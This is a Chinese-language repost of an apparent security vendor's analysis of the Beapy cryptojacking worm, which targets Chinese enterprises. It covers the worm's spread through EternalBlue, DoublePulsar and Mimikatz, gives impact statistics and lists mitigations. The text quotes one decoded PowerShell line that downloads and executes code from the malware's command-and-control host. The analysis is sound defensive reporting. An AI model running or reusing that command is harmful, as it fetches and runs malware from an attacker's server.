内容简介:自2019年1月以来,赛门铁克研究团队首次发现了一种名为Beapy的Cryptojacking攻击行动。Cryptojacking是一种网络攻击方式,黑客通过在网站中加入恶意代码的方式将挖矿程序植入用户的电脑,非法调用用户的硬件资源进行“挖矿”。Beapy通过利用“永恒之蓝”漏洞和窃取硬编码凭证在网络上快速传播。此次攻击行动主要针对中国的企业,自今年3月初以来一直呈现增长势头。Beapy (在Beapy的攻击目标中,几乎所有的受害者都是企业(图1)。Beapy可能是2018年Bluwimps蠕虫(
自2019年1月以来,赛门铁克研究团队首次发现了一种名为Beapy的Cryptojacking攻击行动。Cryptojacking是一种网络攻击方式,黑客通过在网站中加入恶意代码的方式将挖矿程序植入用户的电脑,非法调用用户的硬件资源进行“挖矿”。Beapy通过利用“永恒之蓝”漏洞和窃取硬编码凭证在网络上快速传播。此次攻击行动主要针对中国的企业,自今年3月初以来一直呈现增长势头。
Beapy ( W32.Beapy )是一种基于文件的coinminer,它使用电子邮件作为初始感染载体。在2018年初,Cryptojacking的出现频率曾到达了顶峰,之后就逐渐在走下坡路,但对一些威胁行为者来说,Cryptojacking仍然是他们攻击的重要手段,比如到了2019年,中国企业就成了他们的主要目标。
在Beapy的攻击目标中,几乎所有的受害者都是企业(图1)。Beapy可能是2018年Bluwimps蠕虫( MSH.Bluwimps )攻击趋势的延续,即Cryptojacking的重点开始由对个人转向对企业。虽然当前我们没有证据表明这些攻击是有针对性的,但Beapy的功能表明,它可能是专门为了在企业网络中传播所设计的。
图1.Beapy的感染程度对比-企业与个人
我们之前在对勒索软件的研究中发现,在2018年,尽管总体勒索软件感染率下降了20%,但企业中的勒索软件感染率却增加了12%。企业似乎越来越成为网络犯罪的焦点。
Beapy对亚洲企业的影响最大,超过80%的受害者在中国,剩下的分布在韩国、日本和越南等地。
图2.Beapy在不同国家/地区的感染率
感染链
Beapy感染的初始媒介是电子邮件,其中包含了一份恶意Excel文档附件。当用户打开附件后,DoublePulsar后门(Backdoor.Doublepulsar)会被下载到用户机器上。与EternalBlue一样,DoublePulsar也是由Shadow Brokers(黑客组织,曾泄露大批Windows漏洞以及漏洞利用工具)泄露的,并且曾在2017年被用于WannaCry勒索软件攻击行动中。DoublePulsar能在受感染的计算机上打开后门并远程执行代码。EternalBlue则利用Windows SMB协议中的漏洞允许文件在网络中横向传播。
安装DoublePulsar后,就会执行PowerShell命令,并在将coinminer下载到目标计算机之前与Beapy命令和控制(C&C)服务器进行联系。根据我们遥测数据显示,2019年2月15日为检测到的最早迹象,在此样本中,对PowerShell命令解码后发现了以下内容:
IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
这是与Beapy C&C服务器相连的设备。通过执行一些PowerShell命令下一个载门罗币coinminer。当Beapy传播到网络上的其他计算机时,会重复此过程。
从表面上看,Beapy会先利用未安补丁的机器在网络上立足,然后使用EternalBlue传播到其他机器上去。但对EternalBlue的利用并不是Beapy唯一的传播机制,它还使用凭证窃取工具Hacktool.Mimikatz来从受感染的计算机上收集凭据,并进一步传播到网络中安装了补丁的机器上。Beapy还使用硬编码的用户名和密码列表来尝试跨网络传播,这种方法类似于Bluwimps蠕虫。Bluwimps曾在2017年和2018年间使用coinminers感染了数千台企业机器。
Web服务器
我们还在面向公众的Web服务器上发现了Beapy的早期版本,该蠕虫试图传播到连接到该服务器的计算机,其中一种方法就是生成它试图感染的IP地址列表。
在Web服务器上看到的Beapy是恶意软件的早期版本,用 C语言 而不是 Python 编写。早期版本也包含了用于凭据收集的Mimikatz模块,以及EternalBlue漏洞利用功能。
在此版本中,Beapy还试图利用Apache Struts远程执行漏洞(CVE-2017-5638),此漏洞在2017年出了相应补丁,此外,它还利用了Apache Tomcat(CVE-2017-12615)和Oracle WebLogic Server(CVE-2017-10271)中的公开漏洞。在我们观察到的这个web服务器泄露事件中,攻击尝试是从2月初开始的,在3月13日则首次观察到与Beapy的C&C服务器的连接。针对此web服务器的活动一直持续到4月初。
总的来说,Beapy活动自3月初以来一直在增加。
图3.检测到的Beapy活动呈显著增加趋势
背后的信息
虽然在2018年cryptojacking活动事件下降了52%,但不可否认的是,这仍然是网络犯罪分子感兴趣的领域。从cryptojacking的总体数据来看,2019年3月cryptojacking的尝试攻击次数不到300万次,与2018年2月的峰值相比有很大的下降(当时有800万次),但这仍然是一个巨大的数值。
图4.2018年1月至2019年3月间的cryptojacking活动
Beapy是一个基于文件的coinminer,这跟以往的情况有些不一样,因为我们在过去看到的大多数加密活动都是使用基于浏览器的coinminer进行的,这一方式之所以流行,是因为它降低了入侵的门槛,哪怕补丁完善的机器也能成为感染的目标,另外,这一方式跟2017年9月推出Coinhive货币挖掘服务息息相关,它对cryptojacking的增长中发挥了关键作用,因为这项服务使任何人都能轻易地进行货币挖掘。而后来Coinhive服务的关闭也可能是基于浏览器的cryptojacking下降的原因之一。
除了这些因素之外,基于文件的coinminer也比基于浏览器的coinminer具有明显的优势,因为前者可以更快地挖掘加密货币。门罗币曾是cryptojacking最常开采的加密货币,在2018年贬值了近90%,因此,为了能跑赢贬值速度,挖掘效率越高的方式越受网络犯罪分子的欢迎。
图5。基于文件的coinminer与基于浏览器的coinminer的盈利能力比较
对企业的影响
虽然cryptojacking可能不像勒索软件那样更具破坏性,但它仍可能对公司的运营产生重大影响。
cryptojacking对企业的潜在影响包括:
·设备性能的下降,可能会影响员工工作效率并导致生产力下降
· 电池过热
· 设备老化、无法使用,导致IT成本上升
· 电力使用量增加而导致成本增长,以及基于CPU使用量计费的云计算业务
企业需要确保自己的网络免受各种安全威胁。
缓解方案
· 企业需要多重防御系统,以防止任何特定技术或保护方法中的单点故障。包括端点、电子邮件和web网关保护技术的部署,以及防火墙和漏洞评估解决方案。始终将这些安全解决方案与最新的保护功能保持同步。
· 教育任何使用设备或网络的人,敦促他们对来自陌生来源的电子邮件和未知附件保持谨慎。
· 对员工进行教育,让他们知道电脑出现coinminer的可能迹象,如果存在应立即通知相应部门。
· 监视设备上的电池使用量,如果发现可疑的使用量激增,则对其扫描看是否存在coinminer。
· 安装最新补丁,使用强密码并启用双因素身份验证。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 美国公共部门2019年勒索软件袭击事件已超20起
- 多省多家大型企业遭遇GlobeImposter勒索病毒袭击,文件被加密为.WALKER扩展名
- Window应急响应(二):蠕虫病毒
- Bluehero挖矿蠕虫变种空降!
- 西门子PLC蠕虫病毒研究
- 基于社交媒体的csrf蠕虫风暴探索
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
跨平台桌面应用开发:基于Electron与NW.js
【丹】Paul B. Jensen / Goddy Zhao / 2018-3 / 99
《跨平台桌面应用开发:基于Electron与NW.js》是一本同时介绍 Electron和 NW.js的图书,这两者是目前流行的支持使用 HTML、CSS 和 JavaScript 进行桌面应用开发的框架。书中包含大量的编码示例,而且每个示例都是五脏俱全的实用应用,作者对示例中的关键代码都做了非常详细的解释和说明,可让读者通过实际的编码体会使用这两款框架开发桌面应用的切实感受。除此之外,在内容上,......一起来看看 《跨平台桌面应用开发:基于Electron与NW.js》 这本书的介绍吧!